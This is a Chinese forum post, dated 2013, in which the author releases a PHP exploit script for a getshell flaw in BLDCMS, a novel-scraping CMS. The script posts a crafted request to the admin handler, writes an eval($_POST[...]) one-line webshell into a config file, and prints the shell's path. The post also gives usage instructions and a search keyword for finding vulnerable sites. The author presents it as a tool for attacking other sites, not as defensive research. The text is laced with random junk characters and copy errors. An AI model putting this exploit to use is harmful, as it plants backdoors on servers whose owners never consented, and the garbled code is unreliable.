之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
8 w! f; v& U, u8 ?; u% W1 A
. c. g, k9 g7 Y, l/ g' l4 u Y 0 ]& b7 c6 P- @( }7 m
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
/ q5 K! V2 t/ H# v9 t / ?7 T3 i0 v& p4 Q- X
既然都有人发了 我就把我之前写好的EXP放出来吧
& d( y( q5 j% u- ]9 j. g* a/ @
5 ~: O( ]8 c) ?3 F7 Wview source print?01.php;">- M% g5 f) {8 x7 Y: _0 T3 ^, o
02.<!--?php
1 z# s3 a) p( ]03.echo "-------------------------------------------------------------------
% Y2 ] n4 d* ^; v& \04.
! r6 X) F4 C6 ]: ~) `4 u, y* H9 O05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP+ I: n$ F& C% |5 ?+ F" { E
06. # u! q. X @: P
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
9 e) A9 `; i9 K2 L08. ( @8 r0 e( L& h* ^$ y: X
09.QQ:981009941\r\n 2013.3.21\r\n ' T- F: c1 ?# ^, f2 e: F6 d
10. + Z u# b' h2 ]# `
11.
0 T8 r, M3 M& i8 F0 G8 I12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码. f5 H) a5 V+ j* Z. m1 h' C
13. ! O8 y2 {$ f" g" l* N( o, a
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n----------- S3 t1 H7 ]5 ]6 Z' ~ U( G
15.
$ G# e, o7 X: M( j, Y16.--------------------------------------------------------------------\r\n";
8 [; v- @9 _5 N5 W! T17.$url=$argv[1];! y1 |- [5 B8 }, C5 {
18.$dir=$argv[2];
$ c1 p1 G J% c- b19.$pass=$argv[3];
+ Z7 Q! `* y8 V: M& E20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
+ C! W3 @& I @) c7 T* w$ F21.if (emptyempty($pass)||emptyempty($url))
, Q3 p% ? J" o" U22.{exit("请输入参数");}
* a) ]( U; L' w' r/ H" |6 |23.else
+ ~ q8 ?: j9 v; l$ m24.{
9 T9 W# U- E$ p% l( h" Y25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev+ b1 d0 }0 |& W
26. : ^6 t7 G$ k5 N- l; O: m
27.al;! |3 T4 h% |7 y6 Q: H
28.$length = strlen($fuckdata);
" Q) S! a* O+ C7 ?29.function getshell($url,$pass)
" L9 Q" z0 T K1 v& v8 I30.{6 R2 A4 |& j l& C7 A9 O4 R# U
31.global $url,$dir,$pass,$eval,$length,$fuckdata;
V# S* I6 Y( P32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
a0 k9 w+ g. C, Z6 E4 i& j }33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";; _+ v [# `# D4 {6 n! w5 l* d7 j
34.$header .= "User-Agent: MSIE\r\n";
/ r* L6 V( [0 ?: Y$ d35.$header .= "Host:".$url."\r\n";( [" x9 \4 q% v5 W, c5 g+ e) n \7 N
36.$header .= "Content-Length: ".$length."\r\n";
, G! O9 _% W: q, u; R37.$header .= "Connection: Close\r\n";
( D: b5 v; W3 c9 K: A38.$header .="\r\n";
: A, S# r: e0 Y) u. a39.$header .= $fuckdata."\r\n\r\n";
6 b. U0 a# P/ l6 J40.$fp = fsockopen($url, 80,$errno,$errstr,15);
( \6 e9 n) S, l41.if (!$fp)
' W! k9 l) x/ b, {* j42.{+ h" q3 v, U z2 F! B9 [3 k
43.exit ("利用失败:请检查指定目标是否能正常打开");3 R* o7 ?# o# }5 ^, N+ E6 I
44.}
' ~+ q( Q8 V, n, t: [45.else{ if (!fputs($fp,$header))1 _3 O4 }8 K" R
46.{exit ("利用失败");}
; \ i. c1 {9 Y9 U* Y5 o! i5 }. |47.else
3 \3 y9 p/ e" R- f) i1 e1 R; b48.{$ ?. M, }2 m0 C8 \
49.$receive = '';
) `3 F9 ^* k+ }" q50.while (!feof($fp)) {
- J/ [! \* ]: O' ~/ C8 M51.$receive .= @fgets($fp, 1000);+ F7 _2 L5 b2 c7 }; ^* ]1 S
52.}
0 {7 {4 n6 Z! B4 Y" g- l53.@fclose($fp);
" h. m4 ?, `2 O2 X$ ?" N54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标& J* }; r1 Z5 \# D
55. ( G3 L% Y( `" ~* x. `4 y
56.GPC是否=off)";
% a: Z, N* w* v, y57.}}0 k$ O6 q C5 C4 v7 O( F. i
58.}# |" ]% [' {, P/ N% G
59.}) Q3 G! {( @) p0 v2 s3 Q
60.getshell($url,$pass);
% g2 W% L l& S! w. Q61.?-->
. Q/ B0 v& Q) T. Y) k/ I 2 q2 o3 o; d/ H2 F
E* V* {+ G" N4 F# Q
; q0 b: ?" D1 s1 Y6 k+ @by 数据流
5 z9 [ R/ O# f) B6 I3 c8 m3 Z |
发表于 2013-3-26 20:49:10
收藏
支持
反对